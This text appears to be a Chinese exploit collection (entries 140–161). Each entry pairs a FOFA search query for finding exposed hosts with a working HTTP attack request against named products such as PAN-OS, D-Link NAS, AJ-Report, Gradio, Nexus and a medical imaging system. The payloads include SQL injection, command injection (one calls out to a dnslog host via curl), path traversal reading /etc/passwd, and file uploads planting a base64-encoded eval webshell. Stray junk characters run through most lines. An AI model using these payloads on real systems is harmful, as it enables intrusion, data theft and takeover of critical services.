# U. r* H/ b- z5 f: rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
W' {3 N5 F/ z' cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, {) l4 r* s, Q1 w& I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ V L% O Y) m- _7 x+ _
Accept-Encoding: gzip, deflate, br0 R( s% d5 e+ M! G$ d$ ~9 i
Connection: close( a! \& B. i4 x5 g+ g" e, S* R2 p
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
+ D4 ~- R. e# w/ _# ?. Z" {" U8 |Upgrade-Insecure-Requests: 1
1 X5 ]0 f% |& J% S6 n
$ E5 ^# H, p q2 ?! @! |" X
( X/ ?7 y1 n& P$ a! z5 K$ M6 X140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
0 q: r# I- Y: |; mCVE-2024-2566
. p2 y. w* ?& n3 A, t( {# i6 aFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
6 v2 @' I9 N m+ V( [6 OGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
' {3 c" K, A5 [/ M" ^; M! Q5 G, IHost: x.x.x.x0 h9 ` ?& i9 D% e' N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 D3 F; z: P/ VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 r" q# v! T* z% l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# D j9 W8 g: z
Accept-Encoding: gzip, deflate, br
# \$ c, m% @- ~0 _Connection: close3 k4 h8 K: p5 h; o' I) Y' _
Cookie: authcode=h8g9
. D+ N# O7 O6 F3 t7 NUpgrade-Insecure-Requests: 11 d; y; M) R, M* X* Y
- \8 P2 T5 i1 S7 D" R' i8 |, _& j
$ A* q' T, ^) L' K2 Q) w# @
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
5 r$ E4 H) v2 u+ PFOFA:body="指挥调度管理平台"4 \' R0 h5 d- C6 I8 D
POST /app/ext/ajax_users.php HTTP/1.18 f8 P' a/ U- @+ c$ r
Host: your-ip. |- g9 L6 |# `" u) m0 t q$ v. o- n
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info/ h9 ^& d" Y% E6 u- a
Content-Type: application/x-www-form-urlencoded
* P) Q: ?9 X. ^- _' U$ \9 R/ K% K
: Y* ?9 m$ p5 b. d, M; a) R( j: [1 Z! G4 j
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
2 D0 d# W5 J( b/ V% e1 ?* T, J8 j" W/ j' N5 l
& G4 \9 j: O8 V$ A' N
142. CMSV6车辆监控平台系统中存在弱密码
0 E l* o, v( LCVE-2024-29666/ l2 {, Y+ R. [' Y
FOFA:body="/808gps/"
8 U k% b: r# |1 M! V M" Ladmin/admin+ O& w* i% ~) l
143. Netis WF2780 v2.1.40144 远程命令执行2 Z+ ^5 M8 ^' |2 ~) J z. m4 m
CVE-2024-25850
2 d3 l" U" Q8 l z/ RFOFA:title='AP setup' && header='netis'
l+ T3 }+ b6 d9 m5 fPAYLOAD" k# E) V7 P$ j% B" f+ F- R& {
2 B: g9 N* s+ w144. D-Link nas_sharing.cgi 命令注入
, a+ m7 B- e/ d) @6 x( C5 [+ ]FOFA:app="D_Link-DNS-ShareCenter": T. r0 \, S- X! x* J! |
system参数用于传要执行的命令
. m& T' u( i M- ?4 o& sGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1& {& e; G% M0 Z- q" N% Z
Host: x.x.x.x; u4 |" g0 l( U
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0. U* I# D8 E$ ?9 D* n
Connection: close
7 P2 p; A2 d4 r( b% ~' T R$ r8 pAccept: */*
( W" m& P2 n, E* Z6 x, rAccept-Language: en3 k; ~& _) k7 x, N2 h! K3 K* E$ \
Accept-Encoding: gzip
% m! n" g6 M3 l( e$ r) q( I
8 v+ u L! j, x
' p: C4 \2 w9 p. O+ l145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
$ B+ L3 A0 N; M0 z RCVE-2024-3400: j$ h' J: _8 j1 B" ^5 Z$ j
FOFA:icon_hash="-631559155"1 e% d8 ~, l/ ?4 x; F
GET /global-protect/login.esp HTTP/1.1
( i! M+ _3 A1 b# u$ P) e" PHost: 192.168.30.112:1005
) y5 N7 P0 ]5 p q: \5 Z2 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
5 ^8 Q: @. [6 f, Y! ?Connection: close
" F* W, M* v" |Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
n3 P8 Y% d* n) {( ^Accept-Encoding: gzip
1 V" g9 O! A7 t* @. _0 u8 e' R1 I' q: Y9 M$ S' K
0 }3 L) C1 w+ H* f& P
146. MajorDoMo thumb.php 未授权远程代码执行
0 m) ~2 v0 F% e& sCNVD-2024-02175! a: ~+ P3 e+ U5 F, I. O9 L9 I
FOFA:app="MajordomoSL"7 U# x% G# M* ]# W4 F( R
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
' k% ?5 X# D: V6 ?( _Host: x.x.x.x
2 s$ V9 Q" I! B" k* l0 V) s- \6 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.848 \8 N/ [9 c, c+ y* } \
Accept-Charset: utf-8; J" s) O% s- {, b7 w! M- ~
Accept-Encoding: gzip, deflate7 N: W9 b5 U) {
Connection: close+ R, p% p' y. L" B
" K" W( B) K U* K H$ _# k" j+ U& V, k
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历 z S# h3 r0 Z7 I
CVE-2024-32399$ p! S2 N+ s! h, v ]) T
FOFA:body="RaidenMAILD"
: W( J0 b5 v3 x2 \8 V6 Z( ~GET /webeditor/../../../windows/win.ini HTTP/1.18 L6 N+ b, s7 u6 n
Host: 127.0.0.1:81
$ c: R* \& l' HCache-Control: max-age=0% q" f/ a0 t& p" Q' ?9 P5 z8 ^
Connection: close, B3 U w9 P# L/ f3 S3 Z! Q4 m
/ L1 }1 Y( ^; l2 H4 o. o7 u1 P: h: K) ]
148. CrushFTP 认证绕过模板注入& j* Q5 k1 h& ?, c- q# g* h7 O
CVE-2024-4040
% q: J- r9 d7 g$ @FOFA:body="CrushFTP". Q9 s9 c# h2 {4 n7 O- z5 p
PAYLOAD9 t" U" S; c$ A5 I1 J
$ o6 c: o4 j4 e; ~8 i, [: ?( d149. AJ-Report开源数据大屏存在远程命令执行
) y3 |+ P H: }+ {$ t2 w0 \+ UFOFA:title="AJ-Report"
& S! c3 Y; p6 I* c* A8 d6 { u2 H8 v' p& P9 I
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1+ Q. ]1 ~9 u5 `0 V2 G# M
Host: x.x.x.x- A( E# f. T T4 y. G3 c& ~# O) S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; G( v. f/ P0 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 M! t. X N p" ~9 [0 OAccept-Encoding: gzip, deflate, br
) B# h. q$ n4 I. l0 j3 o- t/ GAccept-Language: zh-CN,zh;q=0.9
9 U+ ]$ s7 M/ u# U6 w: {/ VContent-Type: application/json;charset=UTF-88 C8 H1 d* c' ]8 f& f
Connection: close
4 _7 Y$ _0 K9 \3 ?: `4 v: b2 N& _: A& l4 i+ h9 g
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
4 s& W) X) ~) g) E
$ J) D/ _ d- W: v' g. |% x; o150. AJ-Report 1.4.0 认证绕过与远程代码执行9 z/ I1 n8 }9 L0 K* v' v
FOFA:title="AJ-Report"
: O7 U5 p& n( N: R$ a9 p( z; f% k, nPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
4 Z& A3 J4 \# _9 }& ~6 HHost: x.x.x.x% C( k7 E* {2 [7 p& N# k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. F) O; H1 h% x" j7 w; z0 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 b1 z, k* X! ?6 i/ @Accept-Encoding: gzip, deflate, br
& S( D1 o ^2 V" w1 p4 X0 DAccept-Language: zh-CN,zh;q=0.9
" M$ \9 Y7 G/ g6 z, zContent-Type: application/json;charset=UTF-8
, J, H/ h; P# y! V! I, IConnection: close$ D' Y3 L4 }( d, j1 @. r9 J
Content-Length: 339
4 h W- G( \* m7 M
1 x3 x: x" D# a ~{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
2 X9 U3 Q# o( v P
; D' i3 c0 m t& n$ }: ?, _" j3 k; {* [. u- b1 m
151. AJ-Report 1.4.1 pageList sql注入
& g$ f9 s) u' ZFOFA:title="AJ-Report"
6 l. B4 V' M2 x9 b/ G5 V. q% \GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
$ i+ x1 { W( R( zHost: x.x.x.x7 d, J9 `9 L/ {& \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# s. ^& d& Z {6 Q- E! {& d6 r2 O( X
Connection: close+ n6 ?) e1 W, `: ?
Accept-Encoding: gzip2 o7 v2 i" f- g4 V+ S( z0 m
1 H5 w5 _6 V' Q c
: I; ]# e& e/ B5 s152. Progress Kemp LoadMaster 远程命令执行: {5 L% U: m" ?7 _) U
CVE-2024-1212
. s1 N- g# N. d0 h' dLoadMaster <= 7.2.59.2 (GA)
5 L+ [* d# l. {* m: `7 FLoadMaster<=7.2.54.8 (LTSF)! w4 s- q) {( F- ^1 m) k; d" k4 _$ [
LoadMaster <= 7.2.48.10 (LTS)/ l9 V3 }8 {7 L$ \
FOFA:body="LoadMaster"" {' y8 C( s' E3 r( v; k
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码, y: u4 d, i1 L/ b" K/ ]: h' z1 C
GET /access/set?param=enableapi&value=1 HTTP/1.1
- `: u! ?& H, A2 O8 lHost: x.x.x.x" Q) f) R, E0 S0 w# C0 w# m1 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1+ n8 ^. j( E$ w, F# U
Connection: close
4 g5 }) d* w, p1 rAccept: */*
% F; W7 X+ J- C p1 OAccept-Language: en8 S( t2 e2 j# {+ L) F
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
0 N; R( Y' f% DAccept-Encoding: gzip, C' P3 P+ L. k- K) e4 A7 t
0 B8 {; T0 ^8 e, _7 w# V
- T: G9 Z& B) ~% F8 C# A153. gradio任意文件读取
1 b% z! k# c) h8 D7 JCVE-2024-1561FOFA:body="__gradio_mode__"( I% }, w' M) n
第一步,请求/config文件获取componets的id
# H5 N3 T [3 b& q; `http://x.x.x.x/config4 |1 {! `4 G: ^' e. W6 C
( Z/ K, ~1 t& W0 ]% C4 o7 `$ D% d7 ?5 ]
第二步,将/etc/passwd的内容写入到一个临时文件
' B+ \& r/ ^' x/ `POST /component_server HTTP/1.1
* q5 Q/ {9 a% t! e0 o5 T9 A5 sHost: x.x.x.x) f! b: g- ?/ s! }. k, I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3+ G- f; [ d- f
Connection: close
, G: c4 L% N e8 m. W9 KContent-Length: 1152 E# T0 Q: F/ [) j
Content-Type: application/json2 ^) j8 c4 t& d/ _# _1 j; _
Accept-Encoding: gzip( Z+ T- w; i; W2 Y
7 ]5 H' K7 S2 W c3 |1 h{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
2 L- t+ Y, ]. y4 o, |( \9 \
' Q' |+ ]3 P. A H4 l' P- |& p S) ?
第三步访问1 g1 @6 v E8 a R. L
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd9 ^, R! Z* e( e' u3 m) X$ w
@9 c" D. u$ o" C3 `( J
/ [; Y2 g! y: D8 @# e. u! d/ Z154. 天维尔消防救援作战调度平台 SQL注入
9 g' ?" G& {3 q; {1 }. e& ]CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入") L3 @0 [$ |. B# x2 j
POST /twms-service-mfs/mfsNotice/page HTTP/1.1; Z! H- R* t' n H. |& R
Host: x.x.x.x
( e& C, _; m% A& i, ^; Y" D, t- I1 nContent-Length: 1069 G5 i ]6 [3 n! e) x; Q q
Cache-Control: max-age=0
5 s& t$ l, D# j0 \Upgrade-Insecure-Requests: 1- f4 o* n2 y7 F8 U$ J
Origin: http://x.x.x.x
& P9 w9 @( z! D2 l, q2 _2 pContent-Type: application/json! |5 J- Y& |3 G; B5 Z" m- j6 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
( T- q7 m$ F6 J6 H# l" mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" A, t/ `% q- t/ D# y( O3 W; ~! _; T8 c
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page2 ?. s3 w, u: V# A- T1 c! I
Accept-Encoding: gzip, deflate* p3 ^. H$ R. P: U
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
/ f2 Q+ J' e' _' \6 PConnection: close4 Z. B7 r2 S* y
& E! `6 B3 a6 W( V{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
) |% P1 K0 Y" D5 O7 ]$ M, H+ ?( }
- v: H U7 |2 o% ~155. 六零导航页 file.php 任意文件上传
7 ]# P2 \. l6 mCVE-2024-34982
$ E8 Z" h, }7 a ^FOFA:title=="上网导航 - LyLme Spage"& |- y; U% f+ W/ D- h% ]
POST /include/file.php HTTP/1.1
2 z2 \% _0 o- a4 C: r% k4 S" ZHost: x.x.x.x
, c' I! C8 O; V! qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' C5 l1 \, Y* y4 D# b
Connection: close
2 t! Z0 O) f- q# l& zContent-Length: 232; ^$ w; p" _( c; g8 }
Accept: application/json, text/javascript, */*; q=0.01* G8 ?/ d* [) q0 I
Accept-Encoding: gzip, deflate, br
; T7 ~# e) T: P! o& a8 i" iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, Y$ w3 m$ @& p* {2 P Y5 fContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
! R9 M9 U1 x: ?" l$ @X-Requested-With: XMLHttpRequest
" s C2 D* G$ [
( @. g8 j. k: X4 R: W- s-----------------------------qttl7vemrsold314zg0f
" M) N5 f- c& Z. x" k. RContent-Disposition: form-data; name="file"; filename="test.php"$ ~" O# O$ i T8 i4 D' K2 Y
Content-Type: image/png7 D; d# S. V* l8 y3 Q
$ a+ _+ ?5 R3 A. T( |
<?php phpinfo();unlink(__FILE__);?>
9 p0 U7 t9 d0 \; Q/ k-----------------------------qttl7vemrsold314zg0f--" u" _; t; e! t$ R
- N7 x) G) q5 ~& A2 E$ T
" J- _8 e1 `5 M" L; r. ]9 i: D访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
! D$ a( F7 D7 c$ I& V! ?/ Z; d2 P. v% b4 M$ Q$ l( k
156. TBK DVR-4104/DVR-4216 操作系统命令注入, O; b* ~1 m5 }1 V7 `% m8 }
CVE-2024-3721; V) B$ y- j0 A1 |, z0 m
FOFA:"Location: /login.rsp"
+ r% H8 d7 Z8 H7 ^% Q/ c, ^·TBK DVR-41040 {$ a$ F, R& @1 b
·TBK DVR-4216$ N* @: H9 H) ?" M9 i* d u
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"- G- T- K0 h3 _$ G
1 ~7 d+ O: {4 b' p
& X: {1 w% f! O3 \6 wPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1& z8 ]% m+ m b1 G0 p/ {# H3 u* s4 o
Host: x.x.x.x2 ?3 r0 J4 E9 h/ l A( y
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ B& i# Z8 \& J; ~ i& }4 b( Z
Connection: close( ^) t! r, u$ ~4 l( F
Content-Length: 0
# V5 E0 h! x! E: VCookie: uid=1
0 h1 m! z& M9 C2 R+ qAccept-Encoding: gzip$ N) R' T R) N9 @" ~1 H( }4 J0 J
% L- z- P& G# C# i: c
+ J Y% T h$ A157. 美特CRM upload.jsp 任意文件上传
9 t( E; U7 @# g2 CCNVD-2023-06971
6 H: X! |+ p+ b. t; l% IFOFA:body="/common/scripts/basic.js"
8 ]: x$ }6 v/ c) g5 H) ~! H: m7 APOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1) J* ]) N9 J% v8 U" c
Host: x.x.x.x# `) v) U5 C- s7 f$ Q! [8 D! }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36$ N3 l7 m3 O: B
Content-Length: 709
9 z% f) P4 a& U- Y/ O7 b3 V( fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! R, `( q2 p' q8 w1 cAccept-Encoding: gzip, deflate
* F5 A/ e! c- NAccept-Language: zh-CN,zh;q=0.9
) Z0 G2 e7 O. m. b6 {Cache-Control: max-age=0: J6 I% X9 z. z- z8 ?5 E7 _ k5 C( {; ^
Connection: close( `6 W; v) r& S) M j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
/ i$ X6 v8 F; qUpgrade-Insecure-Requests: 12 e- }5 y/ E( c+ i
S* O& o) g) K- D9 P
------WebKitFormBoundary1imovELzPsfzp5dN' g0 P( B c* T6 @
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
6 C' ~9 f" ~7 j% q% h8 g, D& CContent-Type: application/octet-stream. M- f- `+ ^: i( ^. R
# q' W4 Y Z* ~; y: C7 snyhelxrutzwhrsvsrafb9 o3 b$ O0 J) i; {* K
------WebKitFormBoundary1imovELzPsfzp5dN& w+ E8 @/ @1 `
Content-Disposition: form-data; name="key"' i2 D; m z" ? {) C/ G7 B% ~6 ~' n
9 Q# Z/ D! H5 T3 ?2 x
null% R# Q0 @* j3 T
------WebKitFormBoundary1imovELzPsfzp5dN
% ?7 U5 u8 z! wContent-Disposition: form-data; name="form" `: O, y( a- e
% U/ _+ r$ }9 l2 ?- Gnull
* E: }0 X0 J' a# q( p------WebKitFormBoundary1imovELzPsfzp5dN
9 d- H% C8 R* `: ]2 u6 aContent-Disposition: form-data; name="field"* s3 \0 e( F8 i+ F7 L
$ O |, H; r, v6 n5 a- z+ v
null2 p9 w) e9 t: M, I$ P( w" y
------WebKitFormBoundary1imovELzPsfzp5dN
z0 {9 H0 }3 B8 v+ G8 f# w6 vContent-Disposition: form-data; name="filetitile"
9 H5 S6 R* H8 s0 I* s+ g0 }( N, h T4 H4 r* M
null1 F# q! W* G7 {0 G: f* B% }
------WebKitFormBoundary1imovELzPsfzp5dN
6 L* z% R. |5 E6 qContent-Disposition: form-data; name="filefolder"
$ i7 _" ]" R( Q6 g6 l$ o- Z% }8 B7 I+ i) N3 n' i& v
null, {# h ]! _' ~4 ^
------WebKitFormBoundary1imovELzPsfzp5dN--$ h) q+ Q' M& Z( y W. ^& P/ i& j
/ }3 `" ]; s: R; `
V0 Z% |8 c2 ~; i2 V5 \& R5 C
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
$ f8 |# ?% H1 [: S3 f+ I8 `: r( n5 n2 ^
158. Mura-CMS-processAsyncObject存在SQL注入+ i* b4 }$ \3 ^# V! P( W6 R
CVE-2024-32640
2 O. c1 W' D8 u0 _( V; S5 VFOFA:"Generator: Masa CMS"
! [% v1 ?( g/ h- Q+ c% \4 B8 QPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.15 m5 o- t! n; c: ~& `
Host: {{Hostname}}8 A3 B4 A3 A3 P: g1 X$ H ?9 N
Content-Type: application/x-www-form-urlencoded0 w& ]9 \+ N8 h9 m7 ]" J
0 |+ G" \. ^3 A/ T9 q. kobject=displayregion&contenthistid=x\'&previewid=1 n$ A/ S# S' O8 ~! n
3 q# `) R+ y. c$ \! k$ V; j0 w* B
" d" d1 ^2 {, g: }7 ~8 B: L$ U# b7 H; [
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
( ~5 X4 B( n4 _% s+ j' j; k3 JFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")2 x7 H: Z8 C" T4 E: [* i/ Z
POST /webservices/WebJobUpload.asmx HTTP/1.1( O) d3 L$ f6 e4 M# I1 O) W
Host: x.x.x.x7 M# u3 O" u. W {% ]5 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36& Z: x8 w% q, L, d
Content-Length: 10806 v% ^. o/ K6 S, P/ ~4 x" D; T* |
Accept-Encoding: gzip, deflate
- D1 e5 S+ f! X2 n: P0 @Connection: close
+ X; C, P- ~; p l; `6 {2 ^- V" AContent-Type: text/xml; charset=utf-8% X9 x9 D: _+ J) {/ U1 E+ A
Soapaction: "http://rainier/jobUpload"
& N8 R% U l' ]8 ]4 h; Q1 N$ [$ {% L+ A( q# y
<?xml version="1.0" encoding="utf-8"?>
* Q3 s- u- [- M e) s<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
" {: [9 K+ l0 f8 K2 f. M<soap:Body>
* p# v$ I ]! r<jobUpload xmlns="http://rainier">
7 T& x0 K: O% o3 y2 |<vcode>1</vcode>
, a, j8 D7 Z0 ?- O; r0 X<subFolder></subFolder>
% g9 d1 D, g$ _ f1 B& n6 U+ X<fileName>abcrce.asmx</fileName>
+ e2 y6 M7 U& g* X1 R<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>: M! z$ t' ?4 r d i0 U- H
</jobUpload>; n: z) s8 m- v' L) |+ \
</soap:Body>
* w8 V6 o* `% \</soap:Envelope>7 q% Y( V/ u; Y. n2 \( z* n9 O6 a
: \7 M C1 R0 M ^( A5 ^' O& F" y% h8 ^/ @3 r" F# Y
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
# l: E3 q6 J/ @9 u
l& D3 `0 s' S6 p' L3 q& P+ l- x& _6 Q1 [% H! v" R
160. Sonatype Nexus Repository 3目录遍历与文件读取
- D$ e% s0 y# y+ kCVE-2024-49564 j2 a4 ?/ ?# E. v* G* K; |
FOFA:title="Nexus Repository Manager"
9 N0 q7 w3 l3 {' ZGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1' L' b2 w& n6 \4 H) H" y3 O
Host: x.x.x.x8 @3 D/ r9 W ?; x! }7 ~2 J
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.01 ]0 k2 f- D! X1 p+ K- F
Connection: close% @% a9 d9 L, e5 i# m
Accept: */*
+ O* o0 Q8 L& s& j4 X. K. P8 ]Accept-Language: en1 E. D1 ?+ e4 O6 I7 y2 R
Accept-Encoding: gzip8 a A# w/ V. B" N L2 m
5 ]* q. d6 D! m/ @+ `
+ n8 ?, ~! \# B- R/ ^
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传% z: q9 R# y. ~6 Z
FOFA:body="/KT_Css/qd_defaul.css"
( u, }+ ?4 \& c第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密' s$ S& a) b/ L/ K! e0 B/ e
POST /Webservice.asmx HTTP/1.1
B4 b$ K; l0 ^" YHost: x.x.x.x
; @# g! `& u4 g9 [2 S$ VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
+ O2 g& n4 b) K1 H" NConnection: close
' Z @( [6 w: |, i* P. \; LContent-Length: 445
% L5 U( u$ E1 ^0 ?. d5 R' U7 `Content-Type: text/xml
! l( j3 F5 b' T' FAccept-Encoding: gzip
" o, ?: O1 P/ J) l1 o, B9 M4 a2 W- T2 I$ {9 \% j7 R5 ^
<?xml version="1.0" encoding="utf-8"?>
3 X, Y* _, P- G# {, L6 {<soap:Envelope xmlns:xsi="
" A# R: B# O& x# ~! m3 }% ahttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema") e5 G& d: \. Q; Z# I4 s
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">, t; i3 K+ A! q# w
<soap:Body>- f: }: `" g+ W) [8 L- g+ q0 H" ]8 j
<UploadResume xmlns="http://tempuri.org/">
% m0 `9 t% q4 y7 t+ B<ip>1</ip>
/ a9 |& S3 d! p2 V2 D6 [<fileName>../../../../dizxdell.aspx</fileName>
/ C: {$ J' N- f( S) O<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>4 i4 ]) [1 p6 I$ a$ ~! S- b
<tag>3</tag>: K2 c* p( L; `( A; B( ?/ U( w2 v' y( J
</UploadResume>- _# W. \9 W! r ~7 N( b
</soap:Body>
2 P- ~: b: M% `; J& k$ e3 N</soap:Envelope>
